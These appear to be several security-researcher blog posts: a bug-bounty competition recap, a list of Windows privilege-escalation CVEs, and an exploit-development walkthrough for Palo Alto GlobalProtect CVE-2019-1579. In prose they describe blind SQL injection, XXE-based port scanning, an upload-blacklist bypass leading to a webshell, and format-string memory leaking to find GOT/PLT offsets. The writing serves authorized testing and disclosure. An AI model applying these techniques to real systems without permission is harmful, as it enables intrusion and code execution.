Nothing new here, lots of recon and endpoint enumeration. I began brute-forcing vhosts on domains that were shown to host multiple web applications in an attempt to find new ones. After some time I stumbled across a new web application on a new vhost. This application appeared to have functionality broken out into 3 distinct groupings. Similar to my previous finds I came across various bug types related to access control issues, PII disclosure, and unauthorized data modification. I followed my last approach and began to line-up submissions until I had finished assessing the web application. I then began to stagger the submissions based on the groupings I had identified.

Unfortunately things didn’t go as well this time. The triage time started dragging on so I got nervous I wouldn’t be able to get all of my reports in before the target was put out of scope. I decided to go ahead and submit everything. This was a mistake. When the second group of reports hit, the triage team decided that they considered all 6 of the reports stemmed from an access control issue. They accepted a couple as (1) shared code for 10% payout, then pushed back a couple more to be combined into one report. I pleaded my case to more than one of the triage team members but was overruled. After it was all said and done they distilled dozens of vulnerabilities across over 20 endpoints into 2 reports that would count towards the competition and then put the domain OOS (5). Oh well… I was already in first so I probably shouldn’t make a big stink right?

Over the next month it would seem I was introduced to pretty much any way reports could be rejected unless it was a clear CVSS  10 (This is obviously an exaggeration but these bug types are regularly accepted on the platform).

1.   User account state modification (Self Activation/Auth Bypass, Arbitrary Account Lockout) – initially rejected, appealed it and got it accepted

2.   PII Disclosure – Rejected as  (3). Claimed as customer won’t fix

3.   User Login Enumeration on target with NIST SP 800-53 requirement – Rejected as  (3) and (4) – Even though a email submission captcha bypass was accepted on the same target… Really???

4.   Phpinfo page – Rejected as  (4) even though these are occasionally accepted on web targets

5.   Auth Bypass/Access Control issue – Endpoint behind a site’s login portal allowed for the live viewing of CC feeds – Rejected as (4) with the following

6.   Unauthenticated, On-demand reboot of network protection device – Rejected as  (3) even though the exact same vulnerability had been accepted on a previous listing literally 2 days prior with points awarded toward the competition. The dialog I had with the organizer about the issue below:

At this point it really started to feel like I was fighting a unwinnable battle against the Synack triage team. 6 of my last 8 submissions had been rejected for some reason or another and the other 2 I had to fight for. Luckily the competition would be over shortly and there were very few viable targets eligible for the competition. With 2 days remaining in the competition I was still winning by a couple bugs.

I wish I could say everything ended uneventfully 2 days later but what good Synack sob story doesn’t talk about the infamous 24 hour rule (2). To make things interesting a web target was released roughly 2 days before the end of the competition. I mention “web” because the acceptance criteria for “low impact” (4) bugs is typically lowered for these assessment types which means it could really shake up the scoreboard. Well here we go…

I approached the last target like a CTF, only 48 more hours to hopefully secure the win. Ironically, the last target had a bit of a CTF feel to it. After navigating the application a little, it became obvious that the target was a test environment that had already undergone similar pentests. It was littered with persistent XSS payloads that had been dropped from over a year prior. These “former” bugs served as red herrings as the application was no longer vulnerable to them even though the payloads persisted. I presume they also served as a time suck for many as under the 24 hour rule (1) any red teamer could win the bug if their report was deemed the “best” submission. Unfortunately however, with only a few hours into the test the target became very unstable. The server didn’t go down but it became nearly impossible to login to, regularly returning an unavailable message as if being DOS-ed. Rather than continue to fight with it I hit the sack with hopes that it would be up in the morning.

First thing in the morning I was back on it. With only 12 hours left in the 24 hr rule ( or so I thought) I needed to get some bugs submitted. I came a across an arbitrary file upload with a preview function that looked buggy.

The file preview endpoint contained an argument that specified the filename and mimetype. Modifying these parameters changed the response Content-Type and Content-Disposition (whether the response is displayed or downloaded) headers.

I got the vulnerability written up and submitted before the end of the 24 hour rule. Since persistent XSS has a higher payout and higher CVSS score on Synack, I chose this vulnerability type rather than arbitrary file upload. Several hours after my submission, an announcement was made that due to the unavailability of the application the night previous ( possible DOS) that the 24 hour rule would be extended 12 hours. Well that sux… that means I will now be competing with more reports of possibly better quality for the bug I just submitted because of the extension. Time to go look for more bugs and hopefully balance it out.

After some more trolling around, I found an endpoint that imported records into a database using a custom XML format. Features like this are prime for XXE vulnerabilities. After some testing I found it was indeed vulnerable to blind XXE. XXE bugs are very interesting because of the various exploit primitives they can provide. Depending on the XML parser implementation, the application configuration, system platform, and network connectivity, these bugs can be used for arbitrary file read, SSRF, and even RCE. The most effective way to exploit XXEs is if you have the XML specification for the object being parsed. Unfortunately, for me the documentation for the XML file format I was attacking was behind a login page that was out-of-scope. I admit I probably spent too much time on this bug as the red teamer in me wanted RCE. I could get it to download my DTD file and open files but I couldn’t get it to leak the data.

Since I couldn’t get LFI working, I used the XXE to perform a port scan on the internal server to at least ensure I could submit the bug as SSRF. I plugged in the payload to Burp Intruder and set it on its way to enumerate all the open ports.

After I got the report written up for SSRF I held off on submission in hopes I could get the arbitrary file read (LFI) to work and maybe pull off remote code execution. Unfortunately about this time the server started to get unstable again. For the second night in a row it appeared as if someone was DOS-ing the target and it was between crawling and unavailable. Again I decided to go to bed in hopes by morning it would be usable.

Bright and early I got back to it, only 18 hours left in the competition and the target was up albeit slow. I spent a couple more hours on my XXE but with no real progress. I decided to go ahead and submit before the extended 24 hour rule expired to again hopefully ensure at least a chance at winning a possible “best” report award. Unsurprisingly, a couple hours later the 24 hour rule was extended again (because of the DOS) with it ending shortly before the end of the competition. On this announcement I decided I was done. While the reason behind the extension made sense, this could effectively put the results of the competition in the hands of the triage team as they arbitrarily chose best reports for any duplicated submissions.

The competition ended and we awaited the results. Based on analytics and my report numbers I determined that the bug submission count on the new target was pretty low. As the bugs started to roll in, this theory was confirmed. There were roughly 8 or so reports after accounting for combined endpoints. My XXE got awarded as a unique finding and my persistent XSS got duped under the 24 hour rule that was extended to 48. Shocking, extra time leads to better reports.  Based on the scoreboard, the person in second must have scored every other bug on the board except 1, largely all reflective XSS. For those, familiar with Synack, this would actually be quite a feat because XSS is typically the most duped bug on the platform meaning they likely won best report for several other collisions. I’d like to say good game but certainly didn’t feel like it.

Technical Notes of Interest

The techniques used to discover and exploit most of the vulnerabilities I found are not new. That said, I did learn a few new tricks and wrote a couple new scripts that seemed worth sharing.

  • SQL Injection

SQL injections bugs were my most prevalent find in the competition. Unlike other bug bounty platforms, Synack typically requires full exploitation of vulnerabilities found for full payout. With SQL injection, typically database names, columns, tables, and table dumps are requested to “prove” exploitation rather than basic injection tests or SQL errors. While I was able to get some easy wins with sqlmap on several of the endpoints, some of the more complex queries required custom scripts to dump data from the databases. This necessity produced two new POCs I will describe below.

In my experience a large percentage of modern SQL injection bugs are blind. By blind, I’m referring to SQLi bugs that are not able to return data from the database in the request response. That said, there are also different kinds of blind SQLi. There are bugs that return error messages and those that do not ( completely blind). The first POC is an example of a HTTP GET, time-based boolean exploit for a completely blind SQL injection vulnerability on an Oracle database. The main difference between this POC and previous examples in my github repository is the following SQL query.

Copy to Clipboard

The returned table is two columns of type string and this query performs a boolean test against a supplied character limit, if the test passes, then the database will sleep for a specified timeout. The response time is then measured to verify the boolean test.

The second POC is an example of a HTTP GET, error-based boolean exploit for a partially blind SQL injection vulnerability on an Oracle database. This POC is targeting a vulnerability that can be forced to produce two different error messages.

Copy to Clipboard

The error message used for the boolean test is forced by the payload in the event that the “UTL_INADDR.get_host_name” function is disabled on the target system. Both of the POCs extract strings from the database a character at a time using the binary search algorithm below.

Copy to Clipboard
  • Remote Code Execution (Unrestricted File Upload)

Probably one of the more interesting of my findings was a file extension blacklist bypass I found for a file upload endpoint. This particular endpoint was on a ColdFusion server and appeared to have no allowedExtensions defined as I could upload almost any file types. I say almost because a small subset of extensions were blocked with the following error.

Further research found that the ability to upload arbitrary file types was allowed up until recently when someone reported it as a vulnerability and it was issued CVE-2019-7816. The patch released by Adobe created a blacklist of dangerous file extensions that could no longer be uploaded using cffile upload.

This got me thinking, where there is a blacklist, there is the possibility of a bypass. I googled around for a large file extension list and loaded it up into Burp Intruder. After burning through the list I reviewed the results to see a 500 error on the “.ashx” extension with a message indicating the content of my file was being executed. A little googling later, I replaced my file with this simple ASHX webshell from the internet and passed it a command. Bingo.

Wrap Up

Overall the competition proved to be a rewarding experience, both financially and academically. It also helped knowing that each vulnerability found was one less that could be used to attack US federal agencies. The prevailing criticism I have for the competition is that it was unfortunate that winning became more about exploiting the platform, its policies, and people more than finding vulnerabilities. In CTF this isn’t particularly unusual for newer contests which seem to forget (or not care) about the “meta” surrounding the competition itself. Hopefully, in future competitions some of the nuanced issues surrounding vulnerability acceptance and payout can be detached from the competition scoring. My total tally of vulnerabilities against Federal targets is displayed below.

Bug Type Count CVSS (Competition Metric)
SQL Injection 12 10
Access Control 8 5-9
Remote Code Execution 6 10
Persistent XSS 5 9
Authentication Bypass 2 8-9
Local File Include 2 8
Path Traversal 1 8
XXE 1 5
Rejected/Combined/Duped 16 0

On June 8th it was announced that I had taken 2nd place in the competition and won $15,000 in prize money.

Given the current global pandemic, we decided to donate the prize money to 3 organizations who focus on helping the less fortunate: Water Mission, Low Country Foodbank, and Build Up. For any of you reading this that may have a little extra in these trying times, consider donating to your local charities to support your communities.

A Year of Windows Privilege Escalation Bugs

A Year of Windows Privilege Escalation Bugs

Earlier last year I came across an article by Provadys (now Almond) highlighting several bugs they had discovered based on research by James Forshaw of Google’s Project Zero. The research focused on the exploitation of Windows elevation of privilege (EOP) vulnerabilities using NTFS junctions, hard links, and a combination of the two Forshaw coined as Windows symlinks. James also released a handy toolset to ease the exploitation of these vulnerabilities called the symbolic testing toolkit. Since they have done such an excellent job describing these techniques already, I won’t rehash their inner workings. The main purpose of this post is to showcase some of our findings and how we exploited them.

Findings

My initial target set was software covered under a bug bounty program. After I had exhausted that group I moved on to Windows services and scheduled tasks. The table below details the vulnerabilities discovered and any additional information regarding the bugs.

Vendor Arbitrary File ID Date Reported Reference Reward
(private) Write Undisclosed 04/06/2019 Hackerone 500
Ubiquiti Delete CVE-2020-8146 04/08/2019 Hackerone 667
Valve Write CVE-2019-17180 05/16/2019 Hackerone 1250
(private) Write Undisclosed 04/19/2019 Bugcrowd 600
Thales Write CVE-2019-18232 10/15/2019 ISC-Cert N/A
Microsoft Read/Write CVE-2019-1077 05/06/2019 Microsoft N/A
Microsoft Write CVE-2019-1267 05/08/2019 Microsoft N/A
Microsoft Write CVE-2019-1317 09/16/2019 Microsoft N/A

PreAuth RCE on Palo Alto GlobalProtect Part II (CVE-2019-1579)

Background

Before I get started I want to clearly state that I am in no way affiliated, sponsored, or endorsed with/by Palo Alto Networks. All graphics are being displayed under fair use for the purposes of this article.

I recently encountered several unpatched Palo Alto firewall devices during a routine red team engagement. These particular devices were internet facing and configured as Global Protect gateways. As a red teamer/bug bounty rookie, I am often asked by customers to prove the exploitability of vulnerabilities I report. With bug bounty, this will regularly be a stipulation for payment, something I don’t think is always necessary or safe in production. If a vulnerability has been proven to be exploitable by the general security community, CVE issued, and patch developed, that should be sufficient for acceptance as a finding. I digress…

The reason an outdated Palo Alto Global Protect gateway caught my eye was because of a recent blog post by DEVCORE team members Orange Tsai(@orange_8361) and Meh Chang(@mehqq_). They identified a pre-authentication format string vulnerability (CVE-2019-1579) that had been silently patched by Palo Alto a little over a year ago (June 2018). The post also provided instructions for safely checking the existence of the vulnerability as well as a generic POC exploit.

Virtual vs Physical Appliance

If you’ve made it this far, you’re probably wondering why there’s need for another blog post if DEVCORE already covered things. According to the post, “the exploitation is easy”, given you have the right offsets in the PLT and GOT, and the assumption that the stack is aligned consistently across versions. In reality however, I found that obtaining these offsets and determining the correct instance type and version to be the hard part.

Palo Alto currently markets several next generation firewall deployments, that can be broadly categorized into physical or virtual. The focus of the exploitation details in the article are based on a virtual instance, AWS in this scenario. How then do you determine whether or not the target device you are investigating is virtual or physical? In my experience, one of the easy ways is based on the IP address. Often times companies do not setup reverse DNS records for their virtual instances. If the IP/DNS belongs to a major cloud provider, then chances are it’s a virtual appliance.

If you determine that the firewall type is an AWS instance, then head over to AWS marketplace and spin up a Palo Alto VM. One of the first things you’ll notice here is that you are limited to only the newest releases of 8.0.x, 8.1.x, 9.0.x.

Don’t worry, you can actually upgrade and downgrade the firmware from the management web interface once it has been launched… if you have a valid support license for the appliance. There are some nuances however, if you launch 9.0.x, it can only be downgraded to 8.1.x. Another very important detail is to ensure you select a “m4” instance or when you downgrade to 8.x.x or the AWS instance will be unreachable and thus unusable. For physical devices, the firmware supported can be found here

Getting ahold of a valid support license varies in difficulty and price. If you are using the AWS Firewall Bundle, the license is included. If it’s a physical device, it can get complicated/expensive. If you buy the device new from an authorized reseller, you can activate a trial license. If you buy one through something like Ebay and it’s a “production” device, make sure the seller transfers the license to you otherwise you may have to pay a “recertification” fee. If you get really lucky and the device you buy happens to be a RMA-ed device, when you register it it will show as a spare and you get no trial license, you have to pay a fee to get it transferred to production, and then you have to buy a support license.

Once you have the appliance up and running with the version you want to test, you will need to install a global protect gateway on one of the interfaces. There’s a couple youtube videos out there that go over some of the installation steps but you basically just have to step your way through it until it works. Palo Alto provides some documentation that you can use as a reference if you get stuck. One of the blocking requirements is to install a SSL certificate for the Global Protect gateway. The easiest thing here is to just generate a self signed certificate and import it. A simple guide can be found here. Supposedly one can be generated on the device as well.

If you are setting up an AWS instance, you will need to change a key setting on the network interface or the global protect gateway will not be accessible. Goto the network interface that is being used for the Global Protect interface in AWS. Right click and select “Change Source/Dest Check”. Change the value to “Disabled” as shown below.

Exploitation

Alright, the vulnerable device firmware is installed and the global protect gateway is configured, we’re at the the easy part right??? Well not exactly… When you SSH into the appliance you’ll find you are in a custom restricted shell that has very limited capabilities.

In order to get those memory offsets for the exploit we need access to the sslmgr binary.  This is going to be kinda hard to pull off in a restricted shell. Previous researchers found at least one way, but it appears to have been fixed. If only there was another technique that worked, then theoretically you could download each firmware version, copy it from the device, and retrieve the offsets.

What do we do if we can’t find such a jailbreak… for every version??? Well it turns out we may be able to use some of the administrative functions of the device and the nature of the vulnerability to help us. One of the features that the limited shell provides is the ability to increase the verbosity of the logs generated by key services. It also allows you to tail the log files for each service. Given that the vulnerability is a format string bug, could we leak memory into the log and then read it out? Let’s take a look at the bug(s).

And immediately following, is the exact code we were hoping for. It must be our lucky day.

So as long as we populate those four parameters, we can pass format string operators to dump memory from the process to the log. Why is this important? This means we can dump the entire binary from memory and retrieve the offsets we need for the exploit. Before we can do that, first we need to identify the offsets to the buffers on the stack for each of our parameters. I developed a script that you can grab from Github that will locate the specified parameters on the stack and print out the associated offsets.

The script should output something like the screenshot below. Each one of these offsets points to a buffer on the stack that we control. We can now select one and populate it with whatever memory address we like and then use the %s format operator to read memory at that location.

As typically goes, there are some problems we have to work around to get accurate memory dumps. Certain bad characters will cause unintended output: \x00, \x25, and \x26.

Null bytes cause a problem because sprintf and strlen recognize a null byte as the end of a string. A work around is to use a format string to point to a null byte at a known index, e.g. %10$c.

The \x25 character breaks our dump because it represents the format string character %. We can easily escape it by using two, \x25\x25.

The \x26 character is a little trickier. The reason this character is an issue is because it is the token for splitting the HTTP parameters. Since there aren’t a prevalence of ampersands on the stack at known indexes, we just write some to a known index using %n, and then reference it whenever we encounter an address with a \x26.

Putting this all together, I modified my previous script to write a user-supplied address to the stack, deference it using the %s format operator, and then output the data at that address to the log. Wrapping this logic in a loop combined with our handling of special characters allows us to dump large chunks of memory at any readable location. You can find a MIPS version of this script on our Github and executing it should give you output that looks something like the screenshot below.

Now that we have the ability to dump arbitrary memory addresses, we can finally dump the strlen GOT and system PLT addresses we need for the exploit, easy… except, where are they??? Without the sslmgr binary how do we know what memory address to start dumping to get the binary? We have a chicken or the egg situation here and the 64 bit address space is pretty big.

Luckily for us, the restricted shell provides us one more break. If a critical service like sslmgr crashes, a stack trace and crash dump can be exported using scp. At this point I’ve gotten pretty good at crashing the service so we’ll just throw some %n format operators at arbitrary indexes.

I learned something new about IDA Pro during this endeavor. You can use it to open up ELF core dumps. Opening up the segmentation view in IDA we could finally see where the binary is being loaded in memory. Another interesting detail we noticed while debugging our payloads was that it appeared ASLR was disabled on our MIPS physical device as the binary and loaded libraries were always loaded at the same addresses.

Finally, let’s start dumping the binary so we can get our offsets. We have roughly 0x40000 bytes to dump, at approximately 4 bytes/second. Ummm, that’s going to take… days. If only there was a shortcut. All we really need are the offsets to strlen and system in the GOT and PLT.

Unfortunately, even if we knew exactly were the GOT and PLT were, there’s nothing in the GOT or PLT that indicates the function name. How then does GDB or IDA Pro resolve the function names? It uses the ELF headers. We should be able to dump the ELF headers and a fraction of the binary to resolve these locations. After an hour or two, I loaded up my memory dump into Binary Ninja, (IDA Pro refused to load my malformed ELF). Binary Ninja has proven to be invaluable when analyzing and manipulating incomplete or corrupted data.

A little bit of research on ELF reveals that the PT_DYNAMIC program header will hold a table to other sections that hold pertinent information about an executable binary. Three of which are important to us, the Symbol Table (DT_SYMTAB-06), the String Table (DT_STRTAB-05), and the Global Offset Table (DT_PLTGOT-03). The Symbol Table will list the proper order of the functions in the PLT and GOT sections. It also provides an offset into the String Table to properly identify each function name.

With the offsets to the SYMBOL and STRING tables we can properly resolve the function names in the PLT & GOT. I wrote a quick and dirty script to parse through the symbol table dump and output a reordered string table that matches the PLT. This probably could have been done using Binary Ninja’s API, but I’m a n00b. With the symbol table matched to the string table, we can now overlay this with the GOT to get the offsets we need for strlen and system. We have two options for dumping the GOT. We can either use the crash dump from earlier, or manually dump the memory using our script.

I decided to go with the crash dump to save me a little time. The listing above shows entries in the GOT that point to the PLT (0x1001xxxx addresses) and several library functions that have already been resolved. Combined with our string table we can finally pull the correct offsets for strlen and system and finalize our POC. Our POC is for the MIPS based physical Palo Alto appliance but the scripts should be useful across appliance types with minor tweaking. Wow, all done, easy right?

Important Note

While the sslmgr service has a watchdog monitor to restart the process when it crashes, if it crashes more than ~3 times in a short amount of time, it will not restart and will require a manual restartSomething to keep in mind if you are testing your shiny new exploit against a customer’s production appliance.

❌